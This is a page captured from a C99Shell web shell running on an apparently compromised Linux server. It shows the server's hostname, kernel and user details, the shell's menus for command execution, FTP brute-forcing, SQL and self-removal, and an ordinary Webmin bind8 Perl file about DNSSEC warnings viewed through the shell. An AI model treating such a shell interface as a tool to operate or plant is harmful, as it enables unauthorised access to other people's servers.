!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/bind8/   drwxr-xr-x
Free 26.31 GB of 117.98 GB (22.3%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     system_info.pl (1.11 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

do 'bind8-lib.pl';

sub list_system_info
{
my ($data, $in) = @_;
my @rv;
if (&foreign_available($module_name) && $access{'defaults'} &&
    $config{'dnssec_info'}) {
    # Show DNSSEC client config errors
    my $err = &check_dnssec_client();
    if ($err) {
        push(@rv, { 'type' => 'warning',
                'level' => 'warn',
                'warning' => $err });
        }
    }
if (&foreign_available($module_name) && !$access{'noconfig'} &&
    $config{'dnssec_info'}) {
    # Show DNSSEC expired domains
    my @exps = &list_dnssec_expired_domains();
    if (@exps) {
        my @doms = map { $_->{'name'}." (".&make_date($_->{'expiry'}, 1).")" } @exps;
        my $msg = &text('index_eexpired', join(", ", @doms))."<p>\n";
        my $job = &get_dnssec_cron_job();
        if (!$job) {
            $msg .= &text('index_eexpired_conf',
                      &ui_link(&get_webprefix()."/$module_name/conf_dnssec.cgi",
                           $text{'dnssec_title'}));
            }
        else {
            $msg .= &text('index_eexpired_mod',
                      &ui_link(&get_webprefix()."/$module_name/",
                           $text{'index_title'}));
            }
        push(@rv, { 'type' => 'warning',
                'level' => 'danger',
                'warning' => $msg });
        }
    }
return @rv;
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--